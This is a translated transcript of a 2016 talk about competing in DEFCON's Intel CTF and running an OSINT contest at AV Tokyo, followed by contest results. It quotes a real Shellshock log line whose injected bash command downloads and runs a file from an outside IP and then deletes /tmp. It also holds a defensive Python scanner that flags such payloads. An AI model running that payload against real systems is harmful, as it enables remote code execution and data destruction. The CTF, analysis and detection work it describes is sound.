Intel CTF and Open xINT CTF 20161220
Yuho Kameda
December 20, 2016
A talk about taking part in, and then running, an OSINT CTF! 2016/12/20 #ssmjp
Transcript
A talk about taking part in, and then running, an OSINT CTF! 2016/12/20 #ssmjp @YuhoKameda @pinja_xyz
Self-introduction: Yuho Kameda, ykame (@YuhoKameda). ZAP Evangelist, OSINT. Main work: web application vulnerability assessment, platform vulnerability assessment, SOC/CSIRT work, all-purpose staff for urgent cases..., information gathering.
What I'll talk about today: I took part in Intel CTF at DEFCON, and I ran Open xINT CTF at AV Tokyo.
Took part in Intel CTF at DEFCON
Intel CTF at DEFCON. What is DEFCON? It is held every summer in Las Vegas, right after Black Hat: a hacker festival with all kinds of CTFs and contests.
Intel CTF at DEFCON. What is Intel CTF? A competition that started in 2015 and focuses on intelligence. The theme of the 2nd edition (2016): as a Threat Intelligence Analyst at a company in the world's Top 50, answer a series of questions while tracking down the attacker. First prize: $2,500. We entered as pinja (@lumin, @awamori_tt + me) and finished 12th.
Intel CTF results
What kind of questions were there? Question 1, The Vuln: "What is the vulnerability that was successfully exploited also 'known' as?" Out of 5.08 million lines of Apache logs across 4 files, find the one line where the attack succeeded:
XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/?id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O /tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http://52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
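As an added illustration of this log-hunting step (not code from the talk or from the CTF), here is a Python scan that applies the Shellshock signature to Apache combined-format log lines and pulls out the indicators a defender would pivot on: the source IP, the field the payload arrived in, the injected command and the download hosts it names. The sample log is constructed: one line is adapted from the log line shown above, the others are made-up benign traffic; SAMPLE_LOG, find_shellshock and extract_urls are names I chose, not anything from the CTF.

```python
import re

# Apache "combined" log format. The User-Agent is the final quoted field, which is
# where the Shellshock payload in the challenge log was carried.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# CVE-2014-6271 trigger: a value that starts with a bash function definition "() { ... }"
# followed by ";" and a trailing command that bash executes when it imports the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)')

# URLs embedded in the trailing command: the host an infected machine would fetch from.
URL_RE = re.compile(r'https?://[^\s\'";]+')

# Constructed sample: line 2 is adapted from the log line shown in the talk,
# the other lines are made-up benign traffic (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jul/2016:02:58:18 -0700] "GET /product/?id=2084 HTTP/1.1" '
    '200 5123 "http://shop.example/" "Mozilla/5.0 (X11; Linux x86_64)"',
    'XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/?id=2085 HTTP/1.0" '
    '500 4958 "" "() { : ; }; /bin/bash -c \'wget -O /tmp/a.jpg http://52.37.125.215/ ; '
    'curl -o /tmp/a.jpg http://52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; '
    '/tmp/a ; rm -rf /tmp/*\'"',
    '198.51.100.9 - - [21/Jul/2016:02:58:20 -0700] "POST /login HTTP/1.1" 302 0 "" '
    '"curl/7.47.0"',
]


def parse_line(line):
    """Return the combined-format fields as a dict, or None if the line does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def extract_urls(command):
    """Unique URLs in the injected command, in order of first appearance."""
    seen = []
    for url in URL_RE.findall(command):
        if url not in seen:
            seen.append(url)
    return seen


def find_shellshock(lines):
    """Scan log lines and report every request carrying a Shellshock-style payload.

    All three header-derived fields are checked, because a CGI server passes User-Agent,
    Referer and the request line to bash as environment variables. The HTTP status is
    reported but not treated as proof of success: a 500 is typical of a CGI script whose
    output was disrupted, so the analyst still has to confirm on the host.
    """
    hits = []
    for lineno, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue  # not combined format; a real scan would count these separately
        for field in ("ua", "referer", "req"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                cmd = m.group("cmd").strip()
                hits.append({
                    "lineno": lineno,
                    "ip": rec["ip"],
                    "timestamp": rec["ts"],
                    "status": int(rec["status"]),
                    "field": field,
                    "command": cmd,
                    "urls": extract_urls(cmd),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"line {hit['lineno']}: {hit['ip']} status={hit['status']} via {hit['field']}")
        print("  command:", hit["command"])
        print("  urls:   ", ", ".join(hit["urls"]))
```

Run against a real access log by replacing SAMPLE_LOG with the file's lines; on a 5-million-line set the regex pre-filter is what keeps it fast, and the extracted URLs are the first indicators to check against proxy and DNS logs for any host that actually fetched the payload.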
The answer to question 1? "What is the vulnerability that was successfully exploited also 'known' as?" Our answers kept being rejected... Shellshock? shellshock? Bashbug? CVE-2014-6271? The answer: "Bashdoor".
Other questions. <Level1> Where does the malware connect to? The ASN (Autonomous System Number) of the attacking IP? The version of the web server exposed on the attacking IP? <Level2> The malware's name? The name of the function that has been disabled? The bot's name? The maildrop the bot herder uses?
Another one: Social Engineering CTF (SECTF). A competition in which you phone real companies and extract information, a serious contest that awards a Black Badge. I posted the 2015 details at blog.yka.me: http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html
Ran Open xINT CTF at AV Tokyo
What is AV Tokyo? A hacker community where people from the security scene get together and drink, listen to talks and drink, and drink. no drink! no hack!
The road to the submission. 8/6 20:00: "I'd like to run an OSINT-related CTF in Japan." "Doing it through the company would make the content tricky... how about AV Tokyo's CFx?" "The deadline (8/15) is close; shall we submit once things settle down?" 8/7 10:00 to 16:00: competed in Intel CTF. 8/8 13:19: shared the writeup. 8/8 22:26: drafted the Call For X text. 8/12: Call For X submitted, done.
So we actually ran it: 10/22 15:00 - 19:30 @ Shibuya
What is Open xINT CTF? http://xintctf.wpblog.jp/ A real-world spy training contest: gather the information you need by questioning people at the venue and through SNS, solve the hints that come to light one after another, and reach the final target. (Diagram: the participants, as spies, investigate the attacker, a hacker; a separate spy is in contact with the attacker and is asked to search for a USB device; the participants plant a trap in the USB, make contact, and investigate on their own.)
The 7 questions. 1. The e-mail address of the person who set up pinja.xyz (the attacker)? 2. The Facebook account the attacker owns? 3. The coordinates of the restaurant the attacker stopped at (photo)? 4. The Facebook account of the person eating with the attacker (the spy)? 5. Identify this person (the spy) from the photo, make contact at AV Tokyo, "win their trust" and get information out of them. 6. Using the information obtained from the spy, find the "item" and find the information it yields. 7. Set a trap link on that item and hand the "item" to the attacker at AV Tokyo "without arousing suspicion".
Going to find a certain "item" (a USB device): check for a response in the MAMORIO app (http://www.mamorio.jp/) and search the area where the app picked up a response.
For details, see the participants' writeups! "Extreme CTF is tough (Open xINT writeup?)": http://pinksawtooth.hatenablog.com/entry/2016/10/24/010049 and "Open xINT CTF Writeup": http://qiita.com/nicklegr/items/5ebcdaac86a21613c94a
Participants: 93. Solved question 1: 67. Correct answers per question: Q1: 67, Q2: 49, Q3: 8, Q4: 28, Q5: 7.
Final results? (700 points and above) [total + spy points + time of last answer]
Sh1n0g1       900 + (100)  18:45:56
tigerszk      900 + (100)  19:20:49
rcsirt        900 + (0)    17:16:36
nicklegr      700 + (200)  17:39:52
brightblue    900 + (0)    19:25:33
TomoriNao     700 + (100)  17:20:22
tonko2        600 + (100)  17:11:11
Sakura Ayane  700 + (0)    17:31:46
Anyone whose name does not match the registered name gets 0 spy points. In the event of a tie, the earlier last-answer time ranks higher.